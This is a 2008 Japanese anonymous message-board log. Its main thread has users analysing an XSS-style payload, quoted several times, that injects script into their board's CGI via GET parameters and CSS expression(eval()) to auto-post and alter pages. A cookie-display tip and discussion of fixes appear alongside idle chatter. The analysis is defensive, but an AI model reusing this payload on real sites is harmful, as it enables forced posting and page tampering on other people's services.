> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？

今日のﾛｸﾞを。(;´ω`)
眠い

参考：2008/09/27(土)05時42分55秒

> 寝ます。(;´ω`)

漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？

参考：2008/09/27(土)05時41分56秒

> > 表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際ｺｰﾄﾞとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
> ただのｺﾞﾐなんじゃないかしらん。
> でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

eval

参考：2008/09/27(土)05時38分08秒

> 寝ます。(;´ω`)

一日中ｴﾛｱﾆﾒ転送でもするのかと思った(;´Д`)

参考：2008/09/27(土)05時41分56秒

寝ます。(;´ω`)

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> 表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
> 分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)

これは推測だけど、投稿文字列が数字だけだったことを考えると、
実際ｺｰﾄﾞとして機能してるのって

mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();

だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
ただのｺﾞﾐなんじゃないかしらん。
でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

参考：2008/09/27(土)05時32分48秒

> えここのエロアニメが紙芝居だよ(;´Д`)

うちはそうでもないな(;´Д`)しょぼいAtomと1GBﾒﾓﾘだけど

参考：2008/09/27(土)05時36分42秒

なんだよホモアニメじゃねえか

あーやっとわかった(;´Д`)
　"http://(略)/bbs.cgi&渡したい物"
って事かぁ
普通の構文じゃないデスかぁー

えここのエロアニメが紙芝居だよ(;´Д`)

寝るか(;´Д`)ｼﾐ

こんな時間なのに38人もいるぜ

生き残りたい(;´Д`)生き残りたい

> 訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
> http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

個人指導はどうしようもないよね(;´Д`)個人差がありすぎる

参考：2008/09/27(土)05時32分34秒

はぁ(;´Д`)Shintani

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

オキュメントって物があるのかもしれない！

参考：2008/09/27(土)05時32分16秒

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

それは俺が加工する際に消しちゃっただけだよ(;´Д`)

参考：2008/09/27(土)05時32分16秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)

参考：2008/09/27(土)05時22分23秒

訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> つまりコードをGETで渡されてうかつにも実行しちゃったって事？

ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
数字がでてたことになるね。
でもコードが嫌に不完全なんだよね・・・ ocumentとか。

参考：2008/09/27(土)05時26分58秒

> > 俺も前まで勘違いしてたんだが
> > くずははCookie使ってないんだわ
> > ただ投稿時の名前を保持してるだけ
> まじで(;´Д`)

その状態でjavascript:alert(document.cookie);
ってｱﾄﾞﾚｽﾊﾞｰに入れてｴﾝﾀｰ押せば解りやすい

参考：2008/09/27(土)05時29分05秒

> > http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> > こういうことです
> 出力はしてるけど投稿じゃないでしょ

つかなんでこれGETで出力されんの？(;´Д`)

参考：2008/09/27(土)05時30分01秒

> 例の妖怪はこっちでﾊﾞﾚﾊﾞﾚだったせいかりみくすを一斉に上げはじめた

この人何なの(;´Д`)

参考：2008/09/27(土)05時30分29秒

例の妖怪はこっちでﾊﾞﾚﾊﾞﾚだったせいかりみくすを一斉に上げはじめた

やぁ、おはよう(´ー｀;)

> > というかそうはなってないでしょ(;´Д`)
> > GETで投稿できたらどんな馬鹿掲示板だよそれ
> http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> こういうことです

出力はしてるけど投稿じゃないでしょ

参考：2008/09/27(土)05時28分32秒

えここは朝から変態だなあ(;´Д`)

> > Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)
> 俺も前まで勘違いしてたんだが
> くずははCookie使ってないんだわ
> ただ投稿時の名前を保持してるだけ

まじで(;´Д`)

参考：2008/09/27(土)05時27分42秒

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> で、これが変数に見えるかね？

変数っていうかソースコードに見えます
実行して内部で乱数で数字作っているような

参考：2008/09/27(土)05時26分03秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

今起きた(;´Д`)U2がこんな時間に起きてるってどういうことよ

参考：2008/09/27(土)05時25分00秒

> > これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ
> というかそうはなってないでしょ(;´Д`)
> GETで投稿できたらどんな馬鹿掲示板だよそれ

http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
こういうことです

参考：2008/09/27(土)05時26分47秒

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

俺も前まで勘違いしてたんだが
くずははCookie使ってないんだわ
ただ投稿時の名前を保持してるだけ

参考：2008/09/27(土)05時26分15秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

つまりコードをGETで渡されてうかつにも実行しちゃったって事？

参考：2008/09/27(土)05時22分23秒

しかしえここのｴﾛｱﾆﾒ転送はせっかくのｼｮﾀなのにたまにﾔｸｻﾞ声が聞こえてきて怖い(;´Д`)

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ

というかそうはなってないでしょ(;´Д`)
GETで投稿できたらどんな馬鹿掲示板だよそれ

参考：2008/09/27(土)05時24分56秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

参考：2008/09/27(土)05時22分57秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

で、これが変数に見えるかね？

参考：2008/09/27(土)05時22分23秒

> ああ俺もクアッドほしいなあ(;´Д`)
> 転送したいなあ
> ｸｱｯﾄﾞ買おう

漏れもｸｱｯﾄﾞとかｵｸﾀとかほしいけど液晶ﾀﾌﾞﾚｯﾄもほしい(;´Д`)

参考：2008/09/27(土)05時22分53秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

ｲﾗｯ(;´Д`)

参考：2008/09/27(土)05時25分00秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> これはどうよ(;´Д`)
> http://d.hatena.ne.jp/tociyuki/20060923/1158984768

Jcode.pmに置き換えるのが簡単ならそれが一番ｽﾏｰﾄかな(;´Д`)

参考：2008/09/27(土)05時23分40秒

> まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

暫定対策しかしてない人より最終的にI_RCで対策考えた住人も評価しようよ(;´Д`)

参考：2008/09/27(土)05時19分28秒

ああ眠い寝る
薬ぬんだ
寝る
おやしみ(;´Д`)ｷﾗｯ☆ﾐ